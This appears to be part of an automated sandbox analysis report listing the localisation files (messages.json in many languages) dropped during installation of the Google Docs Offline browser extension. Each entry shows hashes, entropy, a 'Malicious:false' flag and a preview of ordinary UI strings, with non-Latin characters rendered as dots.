                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

